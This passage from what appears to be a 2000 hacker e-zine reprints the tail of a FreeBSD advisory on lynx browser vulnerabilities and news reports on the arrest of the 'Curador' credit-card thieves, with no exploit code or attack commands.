Module:         lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current
Announced:      2000-03-15
Affects:        Ports collection before the correction date.
Corrected:      See below.
FreeBSD only:   NO

I.   Background

Lynx is a popular text-mode WWW browser, available in several versions
including SSL support and Japanese language localization.

II.  Problem Description

The lynx software is written in a very insecure style and contains
numerous potential and several proven security vulnerabilities
(publicized on the BugTraq mailing list) exploitable by a malicious
server.

The lynx ports are not installed by default, nor are they "part of
FreeBSD" as such: they are part of the FreeBSD ports collection, which
contains over 3100 third-party applications in a ready-to-install
format. FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

A malicious server which is visited by a user with the lynx browser
can exploit the browser security holes in order to execute arbitrary
code as the local user.

If you have not chosen to install any of the
lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports/packages,
then your system is not vulnerable.

IV.  Workaround

Remove the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports,
if you have installed them.

V.   Solution

Unfortunately, there is no simple fix to the security problems with
the lynx code: it will require a full review by the lynx development
team and recoding of the affected sections with a more
security-conscious attitude.

In the meantime, there are two other text-mode WWW browsers available
in FreeBSD ports: www/w3m (also available in www/w3m-ssl for an
SSL-enabled version, and japanese/w3m for Japanese-localization) and
www/links. Note that the FreeBSD Security Officer does not make any
recommendation about the security of these two browsers - in
particular, they both appear to contain potential security risks, and
a full audit has not been performed, but at present no proven security
holes are known. User beware - please watch for future security
advisories which will publicize any such vulnerabilities discovered in
these ports.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOM/JklUuHi5z0oilAQEbzQP+K5HbTRk40fmb+pKOcUDD/r4ofcrkWtXn
Ya7PT/ALXvUnohm/jqKofNk9cXK1EspbgHb9N1OJZEzcYUAy378WpQgWh4uxKQa7
+541CwFPPIbWfJQJCOaUODN2qwnXdqXMj6noCKRMN0c3tBRG6R2zEfVaM1vMNS1+
+vcp5WAqDu4=
=dtMU
-----END PGP SIGNATURE-----

@HWA

110.0 Curador? BUSTED
~~~~~~~~~~~~~~~~~~~~~

Contributed by Abattis (Wired) and MerXor (MSNBC)
Follow-ups by Cruci. (MSNBC)

more from HNN in section 119.0

-=-

Sources: Wired, MSNBC

http://www.wired.com/news/business/0,1367,35186,00.html

Alleged Hackers Arrested

Reuters

2:05 p.m. Mar. 24, 2000 PST

The FBI said Friday that two 18-year-olds had been arrested in Wales for
allegedly hacking into nine e-commerce websites around the world and
stealing credit card information.

The losses connected with the intrusions on websites in the United States,
Canada, Thailand, Japan, and Britain could exceed US$3 million, the FBI
said in a news release.

It said the theft of credit card information related to more than 26,000
accounts, the alleged scheme involved the disclosure of the data on the
Internet, and that the accused hackers used the screen name "Curador."

The two youths, who cannot be identified under British law, were arrested
Thursday by the Dyfed-Powys Police Service in Wales for violating
Britain's Computer Misuse Act, the FBI said.
The arrests stemmed from an FBI investigation conducted with the Welsh police, the Royal Canadian Mounted Police, and Internet security consultants, the FBI said, adding that the international banking and credit card industry also provided substantial cooperation. The FBI still is investigating last month's wave of cyber attacks that disrupted some of the Internet's most popular sites. The FBI has yet to make any arrests or bring any charges involving those attacks. The FBI's own website was attacked March 14, the same day the agency celebrated the 50th anniversary of its "Ten Most Wanted Fugitives" list, which is publicized on the site, FBI officials said. -=- MSNBC; http://www.msnbc.com/news/386402.asp Consultant was key to ‘Curador’ bust The FBI crowed, but security specialist led police to Wales By Mike Brunker MSNBC March 27 — While the FBI was quick to take credit for the arrest last week of two teen-agers who allegedly stole information on 26,000 credit cards from Internet retailers, a Canadian computer security consultant working with British authorities tracked the suspects back to their small village in Wales before the U.S. agency even got involved, MSNBC.com has learned. A PRESS RELEASE issued Friday by the FBI said the arrests of the two 18-year-olds .came as a direct result of an FBI investigation.. It added that unidentified Internet security consultants had assisted in the case, but nowhere did it mention Chris Davis of HeXedit Network Security Inc. of Ottawa, Ontario, who worked for nearly two months assembling the evidence that led authorities to the suspects. In interviews with numerous news organizations, including MSNBC.com, after the announcement, the FBI’s Michael Vatis said the arrests should serve as a warning to others who would use the Internet to steal. .It’s important to say that anyone who underestimates the skill of our agents ... does so at their own peril,. he said. 
FBI PLAYED LIMITED ROLE But interviews with Davis and other participants in the case show that the FBI’s role in the investigation of .Curador. was limited. .They (the FBI) did get involved fairly late,. Davis said Monday. .By the time they got involved, (British police) had phone numbers, home addresses and all that.. Phone calls to the National Infrastructure Protection Center, which Vatis heads, were not returned Monday. A spokesman for the FBI declined to comment. .In anything like this, it really doesn’t serve any purpose to go back and try to heap credit one way or the other,. said the spokesman, Paul Bresson. .I think the facts speak for themselves.. But officials of Promobility.net, a wireless phone seller in Ontario that was among the sites hit by .Curador,. confirmed Davis’ account. .That is 100 percent accurate,. spokesman Eric Geiler said. .He could have knocked on [the suspects’] doors two weeks before the FBI did.. Davis, who has been a computer security consultant for nearly four years, said he got involved in the case in early February after reading a boastful post from .Curador. — the online alias that authorities say was jointly used by the two 18-year-old suspects — on HackerNews.com about the theft of credit card information from two e-merchants. The credit card information was subsequently posted on a Web site by .Curador,. who said he took the action to publicize the lack of security at many e-commerce sites. ‘THAT’S PRETTY LOW’ .I read the boast and I thought, ‘That’s pretty low,’. said Davis. .I checked and both sites seemed like fairly small mom-and-pop type operations and I felt sorry for them. So I fired off an e-mail and said and said, ‘I’ll help you secure your site.’ They wrote back and said they had no idea they’d even been hit (by hackers).. Both Promobility.net and Ltamedia.com, a Knoxville, Tenn., seller of .life-enhancing products,. 
agreed to turn over their computer logs to Davis so he could determine how the intruders had gained entry to their systems and close the security holes. Looking through the logs, Davis discovered that the intrusions were accomplished using two known security holes in Microsoft’s Internet Information Server, or IIS. While Microsoft had issued .patches. to correct the holes months earlier, none of the nine Web sites in the United States, Canada, Thailand, Japan and the United Kingdom that were hit by .Curador. had updated their software to eliminate the problem. (Microsoft is a partner in MSNBC.com.) While he could have simply fixed the flaws and returned to his paying jobs, Davis found himself growing increasingly fascinated by the case and pressed on. By analyzing e-mail sent through a free service that the hackers wrongly thought would shield the IP address, Davis was quickly able to determine that .Curador. was using an Internet service provider in England. He then contacted Scotland Yard, which referred him to police in South Yorkshire, who determined from records obtained from the ISP that the .crackers. the term for computer criminals preferred by law-abiding hackers were in Wales. SEARCH NARROWS TO TWO HOUSES Soon, the British investigators tightened the circle to the tiny fishing village of Clynderwen, population 500, and ultimately to two houses in the village. It was then, Davis said, that he heard from the FBI, which learned from the Royal Canadian Mounted Police that he was working on the case while investigating the thefts from U.S. Web sites. .They were able to quickly obtain logs from everybody who had been affected in the U.S. and I explained how ‘Curador’ had broken in, showing them, ‘Here’s the line from the log, here’s how he exploited the security vulnerability.’. The FBI, working with the RCMP and the Welsh Dyfed-Powys Police Service, orchestrated the arrests on Thursday of the 18-year-old suspects. 
The teenagers were questioned for 12 hours after their arrest before being released on bail as the investigation continues, Welsh police said Monday. In accordance with British law, neither of the suspects was publicly identified. But one, Raphael Gray, has given numerous interviews since his release to say that he had acted only to highlight the lack of security on many retail Web sites. "I have done the honest thing, but I have been ignored," he was quoted as saying by the Sunday Telegraph of London. "That’s why I posted the information on the Internet."

CURADOR’S CLAIMS

Authorities have not identified the nine e-commerce sites they say were burgled, but according to "Curador’s" Web sites others include Feelgood Falls; Sales Gate; Shopping Thailand; Vision Computers; NTD Media and the American Society of Clinical Pathologists.

Gray has maintained in interviews since his arrest that neither he nor his friend had used the stolen credit card data for personal gain — an assertion backed up by a British businessman who said he hired Gray to run his e-commerce site. "I’d have to give him money to buy lunch or get a haircut," the businessman told MSNBC.com on Monday.

The businessman, who contacted MSNBC.com, agreed to talk about Gray on the condition that neither he nor his Web site be identified because he feared it would be bad for business. His account could not be independently confirmed, but his description of Gray was consistent with other published accounts.

The businessman said Gray worked part-time for him for two to three months and was in charge of the company’s Web site, which sells video games. He was fired on March 2 because of chronic absenteeism, he said.

‘HE KNEW HIS STUFF’

"He was very good at his job," said the man. "Didn’t turn up very often and his personal hygiene wasn’t too good, but he knew his stuff.

"He worked developing my company’s e-commerce site, which he claimed was going to be the most secure in the business.
What I didn’t realize was that I had one of the world’s biggest credit card hackers looking after my customers."

Meanwhile, a claim by Gray that a credit card belonging to Microsoft founder Bill Gates was among the credit cards he and his friend are accused of stealing was determined to be false on Monday. Gray told the Sunday Telegraph that he had sent information on a number of the cards, including Gates’ card, to a U.S. Web site registered to NBC. (NBC is a partner in MSNBC.com.) But examination of one of the Web sites posted by "Curador" showed an entry about William F. Gates. The Microsoft founder’s name is William H. Gates. The credit card number listed also had too few digits to be valid, and both Microsoft’s address and Gates’ e-mail address were incorrect.

Gray and his friend could face charges under Britain’s Computer Misuse Act of 1990. They also could eventually be extradited to face charges in the United States, the FBI’s Vatis told MSNBC.com on Friday. "The primary consideration is what’s in the interest of justice," said Vatis. "... We have obviously been investigating violations of U.S. federal criminal law."

The teens are alleged to have caused losses that Vatis said could amount to more than $3 million, based on the cost of canceling the 26,000 credit card accounts and issuing new cards. And Vatis said that was "just one measure of possible loss." Other costs could arise from any fraudulent use of the credit card numbers, as well as the expense of repairing compromised Web sites, he said.

The arrests in Wales appear to represent the first major international response to a rapidly growing field in computer crime. Earlier this month, in response to an MSNBC.com investigation of international online credit card theft, spokesmen for the FBI and other organizations involved in fighting cybercrime said they could not recall any past prosecutions in such matters.
On Friday, Vatis said he could easily think of "international hacking incidents" that have led to prosecutions, but not in the context of online credit card information. Many such cases are under investigation, he said. Vatis said the international hurdles to investigating Internet crime were not as high as some people might think, contending that the FBI was "building more and more bridges every day" with law enforcement agencies in other countries.

-=-

MSNBC supplementary; March 24th

Can hackers kill credit cards?
Spate of e-commerce intrusions might mean a new form of payment system will come sooner than expected
By Bob Sullivan
MSNBC

March 24 — He calls himself "The Saint of E-commerce." Two months ago, "Curador" started posting his catalog of stolen credit card numbers on his Web page. He stole database after database from a variety of e-commerce sites, each time updating his site, then gleefully mailing notification to reporters. He topped 25,000 records from 13 Web sites. Despite all that financial risk and all that violation of personal privacy, no one could stop him. But now authorities in Wales have arrested two 18-year-olds on charges related to the Curador thefts.

AUTHORITIES, OF COURSE, had always removed Curador’s Web site — at least a dozen times. No matter; he used the many free, anonymous Web hosting services available on the Internet. And as fast as his Web page was taken down, "Curador" would put up another one.

The 18-year-old computer intruder, who also goes by the nickname "mind gimp," told MSNBC in a telephone interview only that he was located somewhere in Europe. He wasn’t using the credit cards for financial gain, he said. The self-proclaimed "Saint of E-commerce" said he simply wanted to embarrass the victim Web sites into employing better security. He promised to continue breaking into e-commerce sites and posting stolen numbers "until I don’t need to do it anymore or until I get arrested."
But until Thursday, as MSNBC’s Mike Brunker reported earlier this month, there hadn’t been a single reported arrest of a foreign credit card thief by U.S. authorities.

Curador’s thefts are just another story in this year’s litany of tales surrounding online theft of personal and financial information. E-merchants are furiously fighting the battle to keep down fraud costs, and consumer confidence in Internet safety is continually shaken, with no apparent end in sight. So some experts think Curador may just be another nail in the coffin of a credit card system that was hardly designed for Internet purchasing. "Anyone who’s serious about this is getting a lesson. The wake-up c